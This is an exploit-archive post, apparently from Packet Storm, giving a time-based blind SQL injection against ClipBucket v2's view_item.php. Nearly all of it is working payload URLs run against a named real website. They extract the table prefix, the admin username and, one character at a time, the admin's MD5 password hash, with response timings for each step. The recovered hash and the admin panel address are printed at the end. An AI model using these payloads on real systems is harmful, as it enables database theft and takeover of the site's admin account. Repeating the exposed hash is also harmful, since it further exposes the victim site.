exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ClipBucket 2 Blind SQL Injection

ClipBucket 2 Blind SQL Injection
Posted Jul 18, 2012
Authored by Akastep

ClipBucket version 2 suffers from a remote blind SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection
SHA-256 | 908a1ea098afb0afffccbe3d11106c241ae2a4f161d8387e327501693cbf137d

ClipBucket 2 Blind SQL Injection

Change Mirror Download
===============================================================================
Vulnerable Software: ClipBucket v2
Official Site: http://clip-bucket.com/

================================================================================
Exploited: In Wild.
================================================================================

Vuln Desc:
ClipBucket v2 is prone to Blind Sql injection vuln.

It seems it is pretty oldish version and i'm a bit lazy to "fingerprint" which build is vulnerable.

Anyways, at least from source code of page it will "say" : <!-- ClipBucket v2 -->

If you want to fingerprint is target site vulnerable:Use simply this way: (If you got "delay" this means it is vulnerable version)

site.tld/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(1=1,sleep(50),0))--


Theris also another way to fingerprint it:
On vulnerable versions you will find such menu's: (Especially Help Menu section on index page)


© ClipBucket v2 2012
Home Contact Us About us Privacy Policy Terms of Serivce Help


Real exploitation example:


radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x31),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--





table name 13 simvoldur burda
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(length(table_name)=char(0x3133),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--




table prefixi oyrenmek lazimdir:



http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name1,1)=char(0x30),sleep(50),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--






BU DUZ VERIR.
//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(0x616263,1,1)=char(0x61),sleep(54),0))--


//TRUE tablin 1ci simvolu:
c
=========================
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,1,1)=char(99),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--


2-ci simvolu: b


3-cu simvolu: _

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(table_name,3,1)=char(95),sleep(54),0) from information_schema.tables where TABLE_schema !=0x696E666F726D6174696F6E5F736368656D61 limit 1)--



table prefix: cb_




User id ni yoxluyuruq:

//TRUE
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(userid=char(49),sleep(54),0) from cb_users limit 1)--


ID=1

UNAME: admin

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users limit 1)--

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(username=char(97,100,109,105,110),sleep(54),0) from cb_users where userid=1)--



Passi cekmek yolu:


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(97),sleep(54),0) from cb_users where userid=1)--



PASS:
=======================================================
1-ci simvol: 3
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=char(51),sleep(54),0) from cb_users where userid=1)--

YAXUD:


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,1)=0x33,sleep(54),0) from cb_users where userid=1)--


RTIME: 56250 ms

=======================================================
2-ci simvol: 5
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,2,1)=0x34,sleep(54),0) from cb_users where userid=1)--
RTIME: 55578 ms
=======================================================
3-cu simvol: c

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,3,1)=0x43,sleep(54),0) from cb_users where userid=1)--

RTIME: 55579 ms

=======================================================
4-cu simvol: 3

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,4,1)=0x33,sleep(54),0) from cb_users where userid=1)--

RTIME 55656
=======================================================
5-ci simvol: a

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,5,1)=0x41,sleep(54),0) from cb_users where userid=1)--

RTIME: 56234

=======================================================
6-ci simvol: 6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,6,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 69672 ms
=======================================================
7-ci simvol: a (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,7,1)=0x41,sleep(54),0) from cb_users where userid=1)--

RTIME : 17266 ms
=======================================================
8-ci simvol: 6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,8,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56141 ms

=======================================================
9-cu simvol: 6
http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,9,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56125 ms
=======================================================
10-cu simvol: 2

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,10,1)=0x32,sleep(54),0) from cb_users where userid=1)--

RTIME: 56157 ms
=======================================================
11-ci simvol: 3

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,11,1)=0x33,sleep(54),0) from cb_users where userid=1)--


RTIME: 55937 ms

=======================================================
12-ci simvol: b

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,12,1)=0x42,sleep(54),0) from cb_users where userid=1)--

RTIME: 56234
=======================================================
13-cu simvol: 6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,13,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56219 ms

========================================================
14-cu simvol: 9

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,14,1)=0x39,sleep(54),0) from cb_users where userid=1)--

RTIME: 56297 ms

========================================================

15-ci simvol: 5

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,15,1)=0x35,sleep(54),0) from cb_users where userid=1)--

RTIME: 55641 ms

=========================================================
16- ci simvol: f

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,16,1)=0x46,sleep(54),0) from cb_users where userid=1)--

RTIME: 56828 ms
=========================================================

17-ci simvol: 7


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,17,1)=0x37,sleep(54),0) from cb_users where userid=1)--


RTIME: 56296 ms

=========================================================

18-ci simvol: 5 (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,18,1)=0x35,sleep(54),0) from cb_users where userid=1)--


RTIME: 55469 ms

==========================================================

19-cu simvol: 6

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,19,1)=0x36,sleep(54),0) from cb_users where userid=1)--

RTIME: 56390 ms
=========================================================
20-ci simvol: b

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,20,1)=0x42,sleep(54),0) from cb_users where userid=1)--


RTIME: 56375

========================================================

21-ci simvol: d (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,21,1)=0x44,sleep(54),0) from cb_users where userid=1)--

RTIME 55796 ms


=======================================================

22-ci simvol: d (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,22,1)=0x44,sleep(54),0) from cb_users where userid=1)--

RTIME 56406



=======================================================
23-cu simvol: f

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,23,1)=0x46,sleep(54),0) from cb_users where userid=1)--

RTIME: 55563 ms


========================================================
24-cu simvol: 0 (yoxla sonra)

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,24,1)=0x30,sleep(54),0) from cb_users where userid=1)--

RTIME: 56172 ms

========================================================
25-ci simvol: 4

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,25,1)=0x34,sleep(54),0) from cb_users where userid=1)--

RTIME: 56078 ms

========================================================
26-ci simvol: 9


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,26,1)=0x39,sleep(54),0) from cb_users where userid=1)--


RTIME: 55594 ms

========================================================
27-ci simvol: 6


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,27,1)=0x36,sleep(54),0) from cb_users where userid=1)--


RTIME: 56094 ms


========================================================
28-ci simvol: 7


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,28,1)=0x37,sleep(54),0) from cb_users where userid=1)--


RTIME: 56109 ms

========================================================
29-cu simvol: c

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,29,1)=0x43,sleep(54),0) from cb_users where userid=1)--


RTIME: 55563 ms


========================================================
30-cu simvol: d

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,30,1)=0x44,sleep(54),0) from cb_users where userid=1)--

RTIME: 55625 ms

========================================================

31-ci simvol: 5

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,31,1)=0x35,sleep(54),0) from cb_users where userid=1)--

RTIME: 56188 ms


=========================================================

32-ci simvol: 7


http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,32,1)=0x37,sleep(54),0) from cb_users where userid=1)--


RTIME: 55625 ms



=========================================================
So we got:

uname: admin
MD5 HASH: 35c3a6a6623b695f756bddf04967cd57
Admin Panel: http://radio5.5.am/admin_area/


//TRUE

Verifying is obtainted hash valid?
In this case it gives again "delay" which is hint for us: Obtained hash is valid.

http://radio5.5.am/view_item.php?item=BK1198YX9AX1&type=photos&collection=99999999 or (select if(substr(password,1,33)=0x3335633361366136363233623639356637353662646466303439363763643537,sleep(54),0) from cb_users where userid=1)--


[ ]Done[ ]





+++++++++My Special thanks to:+++++++++++++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
++++++++++++++++++++++++++++++++++++++++++++++++

Respect && Thank you.

/AkaStep ^_^



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close